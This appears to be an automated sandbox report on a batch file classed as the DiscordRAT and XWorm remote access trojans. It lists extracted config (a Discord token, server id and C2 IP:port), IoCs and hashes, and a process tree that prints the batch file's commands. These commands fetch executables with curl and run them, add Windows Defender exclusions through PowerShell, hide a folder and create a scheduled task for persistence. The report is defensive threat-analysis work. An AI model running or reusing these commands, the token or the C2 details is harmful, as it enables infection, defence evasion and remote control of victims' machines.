discordrat | cb8da43f966cd7d743931093a1bf1368ab46628357b957407844c05d7af14e5c

Analysis

max time kernel
92s
max time network
95s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
29-06-2024 13:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sharp CS V1.bat
Size

555B
MD5

0d521243334977834c249e26f879d0e5
SHA1

c8a6339e8aff5ac5db00dae42a5f8c577b814421
SHA256

cb8da43f966cd7d743931093a1bf1368ab46628357b957407844c05d7af14e5c
SHA512

32182d1b82b55eeb771e816f3fc60a02adf8c6224407f52f2e92eb6649143e0b8d4901f1167b32f096425937d855111948dc40a7969ed8d4433485cf7628172d

Score

10^/10

discordrat xworm defense_evasion execution persistence rat rootkit stealer trojan

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI0MzQwMDg0MDc3NDE2MDM4NQ.Gnre8o.K_NB2WHxREqF5j5C1y9xsPSpv67TWHFacISXVA
server_id
1256564842899181648

Extracted

Family

xworm

147.185.221.20:5050

192.168.1.11:5050

Attributes

Install_directory
%AppData%
install_file
Client.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Program Files\System64\XClient.exe	family_xworm
behavioral1/memory/3452-15-0x0000000000780000-0x000000000079A000-memory.dmp	family_xworm

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2440 powershell.exe
1080 powershell.exe
812 powershell.exe
2976 powershell.exe
Downloads MZ/PE file

Drops startup file 2 IoCs

Processes:

XClient.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	XClient.exe

Executes dropped EXE 4 IoCs

Processes:

Packages.exeSystem.exeXClient.exeClient.exe

pid process

1212 Packages.exe
4704 System.exe
3452 XClient.exe
3708 Client.exe

pid	process
1212	Packages.exe
4704	System.exe
3452	XClient.exe
3708	Client.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

XClient.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe"	XClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

Processes:

flow	ioc
36	raw.githubusercontent.com
42	raw.githubusercontent.com
44	discord.com
46	discord.com
2	raw.githubusercontent.com
2	discord.com
27	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ip-api.com
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

4584 cmd.exe

flow	ioc
22	ip-api.com

pid	process
4584	cmd.exe

Drops file in Program Files directory 3 IoCs

Processes:

curl.execurl.execurl.exe

description	ioc	process
File created	C:\Program Files\System64\System.exe	curl.exe
File created	C:\Program Files\System64\Packages.exe	curl.exe
File created	C:\Program Files\System64\XClient.exe	curl.exe

Drops file in Windows directory 4 IoCs

Processes:

UserOOBEBroker.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3568 schtasks.exe

pid	process
3568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2440	powershell.exe
2440	powershell.exe
1080	powershell.exe
1080	powershell.exe
812	powershell.exe
812	powershell.exe
2976	powershell.exe
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

XClient.exeSystem.exepowershell.exepowershell.exepowershell.exepowershell.exeClient.exe

description	pid	process
Token: SeDebugPrivilege	3452	XClient.exe
Token: SeDebugPrivilege	4704	System.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeDebugPrivilege	3452	XClient.exe
Token: SeDebugPrivilege	3708	Client.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

OpenWith.exeOpenWith.exe

pid process

4192 OpenWith.exe
2252 OpenWith.exe

pid	process
4192	OpenWith.exe
2252	OpenWith.exe

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

cmd.exePackages.execmd.execmd.exeXClient.exe

description	pid	process	target process
PID 4088 wrote to memory of 1776	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 1776	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 3328	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 3328	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 2044	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 2044	4088	cmd.exe	curl.exe
PID 4088 wrote to memory of 1212	4088	cmd.exe	Packages.exe
PID 4088 wrote to memory of 1212	4088	cmd.exe	Packages.exe
PID 4088 wrote to memory of 1212	4088	cmd.exe	Packages.exe
PID 4088 wrote to memory of 4704	4088	cmd.exe	System.exe
PID 4088 wrote to memory of 4704	4088	cmd.exe	System.exe
PID 4088 wrote to memory of 3452	4088	cmd.exe	XClient.exe
PID 4088 wrote to memory of 3452	4088	cmd.exe	XClient.exe
PID 1212 wrote to memory of 4192	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4192	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4192	1212	Packages.exe	cmd.exe
PID 4192 wrote to memory of 4212	4192	cmd.exe	mode.com
PID 4192 wrote to memory of 4212	4192	cmd.exe	mode.com
PID 4192 wrote to memory of 4212	4192	cmd.exe	mode.com
PID 1212 wrote to memory of 956	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 956	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 956	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 3944	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 3944	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 3944	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4380	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4380	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4380	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4584	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4584	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4584	1212	Packages.exe	cmd.exe
PID 4584 wrote to memory of 3828	4584	cmd.exe	attrib.exe
PID 4584 wrote to memory of 3828	4584	cmd.exe	attrib.exe
PID 4584 wrote to memory of 3828	4584	cmd.exe	attrib.exe
PID 1212 wrote to memory of 1936	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 1936	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 1936	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4596	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4596	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4596	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4176	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4176	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4176	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4592	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4592	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 4592	1212	Packages.exe	cmd.exe
PID 3452 wrote to memory of 2440	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 2440	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 1080	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 1080	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 812	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 812	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 2976	3452	XClient.exe	powershell.exe
PID 3452 wrote to memory of 2976	3452	XClient.exe	powershell.exe
PID 1212 wrote to memory of 948	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 948	1212	Packages.exe	cmd.exe
PID 1212 wrote to memory of 948	1212	Packages.exe	cmd.exe
PID 3452 wrote to memory of 3568	3452	XClient.exe	schtasks.exe
PID 3452 wrote to memory of 3568	3452	XClient.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3828 attrib.exe

pid	process
3828	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sharp CS V1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4088

C:\Windows\system32\curl.exe
curl -LJO https://github.com/LongYears9/tools/raw/master/System.exe
2⤵
- Drops file in Program Files directory
PID:1776

C:\Windows\system32\curl.exe
curl -LJO https://github.com/LongYears9/tools/raw/master/Packages.exe
2⤵
- Drops file in Program Files directory
PID:3328

C:\Windows\system32\curl.exe
curl -LJO https://github.com/LongYears9/tools/raw/master/XClient.exe
2⤵
- Drops file in Program Files directory
PID:2044

C:\Program Files\System64\Packages.exe
"C:\Program Files\System64\Packages.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mode con:cols=0120 lines=0030
3⤵
- Suspicious use of WriteProcessMemory
PID:4192

C:\Windows\SysWOW64\mode.com
mode con:cols=0120 lines=0030
4⤵
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c title Window Title
3⤵
PID:956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\myfiles" mkdir "C:\Users\Admin\AppData\Local\Temp\myfiles"
3⤵
PID:3944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Admin\AppData\Local\Temp\wtmpd"
3⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
4⤵
- Views/modifies file attributes
PID:3828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\i6.t
3⤵
PID:1936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\i6.bat
3⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c
3⤵
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
3⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c
3⤵
PID:948

C:\Program Files\System64\System.exe
"C:\Program Files\System64\System.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Program Files\System64\XClient.exe
"C:\Program Files\System64\XClient.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\System64\XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1784

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3520

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:3852

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
1⤵
PID:704

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4192

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2252

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1496

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\System64\Packages.exe
Filesize
83KB

MD5
e155e62ecf5be9131dadecb19213a92a

SHA1
9ed3d1543b037e901c8870bd360bd5d65e15bda1

SHA256
70e2268a76050c6354ad22b0b997a41a48d7148219f6459acd44aadabe3bc500

SHA512
fdc30e0fc2d98b27a7fd145247373e5a38856cacaf6f6f66f2716175a4e2ced25f7383a1a42c2c8863a937a345362748575db4a65945e29c3f787975e1402959

Download Submit
C:\Program Files\System64\System.exe
Filesize
78KB

MD5
e102b8965e704f7ec4a214ce99b135c8

SHA1
8cba275b20c831b3b8f0506b5be5a3b0933b77c0

SHA256
8d172d0825449e0471982d06cac82536652167eee091815da823ae1d1fffedcf

SHA512
71e46823794dc72ff76c674e16538d24d18d0c9cb14bfa28c0bae38a3ebeeeba7a503fea5f9f5504c631eeaffe61a2187453c2d5991dd1c84a2c6ce48f5f4158

Download Submit
C:\Program Files\System64\XClient.exe
Filesize
75KB

MD5
c072069a1f0f8c7ac8ee5c1dc3e445a8

SHA1
ff2c818035842a95b78abb69b6d3f7a50df41b01

SHA256
8f3d8320c6cc345e2b6baac8df6c403588a951e9ba2c53bccd0a0fb6ad1fe616

SHA512
d734c59f712384f0d977a13028800bcb2dd404c189a8933d7e4fe7261c00fdc47f36051de09f55325ab613a69e5ee9e1eb94abd5d09ede4db2abb7b130eb1d91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
ffbc59d265191e29ec8b34601d8a011a

SHA1
ae9c9451ee4429ed3c1250af6f7bb1a791a7b851

SHA256
52dd5d5b5b5a12fc281aeae7f64fef0104446c9b8fc46128317e35512bbcb01e

SHA512
9745d9ecbf05b7871f7a738e06ba974f1316faaa7a40c75a7ba971987103c743e64f915089f964fd10a04c07e5205642547686aa5f6a5e0af6f8e0ddc067733f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
55f30089624be31af328ba4e012ae45a

SHA1
121c28de7a5afe828ea395d94be8f5273817b678

SHA256
28e49da06bd64f06a4cf1a9caead354b94b4d11d5dc916a92da0ed96bad00473

SHA512
ef13cc5b22c754c7816e08b421de64bc8df527d7166e970454139410b2d381b53ebf288ec73013cdce92f0ac226d9ed5b342341db52a8cb0b85b5ad4d3090787

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yjtisdpr.4sb.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\i6.bat
Filesize
173B

MD5
0f8f70e88009593eefaa155a8e31b1d6

SHA1
eabcc3f2135e0919e9456da0a4b1084f3382d4b6

SHA256
941c169c07670650fc6c6148c1cae068b69bac209e05010594e164aafc7cdf8b

SHA512
94df468b963f3c9d133a25e1ffa57039fac01fe960f0f738552ca6440e6242ff48d0b410fe70dd05a62e4842c925c9f2b0220ca9eb9cb4ff5490ada443c9a750

Download Submit
C:\Users\Admin\AppData\Local\Temp\i6.t
Filesize
3B

MD5
a5ea0ad9260b1550a14cc58d2c39b03d

SHA1
f0aedf295071ed34ab8c6a7692223d22b6a19841

SHA256
f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04

SHA512
7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

Download Submit
memory/2440-24-0x000001836D9E0000-0x000001836DA02000-memory.dmp

Filesize
136KB

Download
memory/3452-16-0x00007FFC769A0000-0x00007FFC77462000-memory.dmp

Filesize
10.8MB

Download
memory/3452-15-0x0000000000780000-0x000000000079A000-memory.dmp

Filesize
104KB

Download
memory/3452-71-0x00007FFC769A0000-0x00007FFC77462000-memory.dmp

Filesize
10.8MB

Download
memory/4704-17-0x0000023B51090000-0x0000023B515B8000-memory.dmp

Filesize
5.2MB

Download
memory/4704-14-0x0000023B4FC10000-0x0000023B4FDD2000-memory.dmp

Filesize
1.8MB

Download
memory/4704-9-0x0000023B35570000-0x0000023B35588000-memory.dmp

Filesize
96KB

Download
memory/4704-8-0x00007FFC769A3000-0x00007FFC769A5000-memory.dmp

Filesize
8KB

Download
memory/4704-70-0x00007FFC769A3000-0x00007FFC769A5000-memory.dmp

Filesize
8KB

Download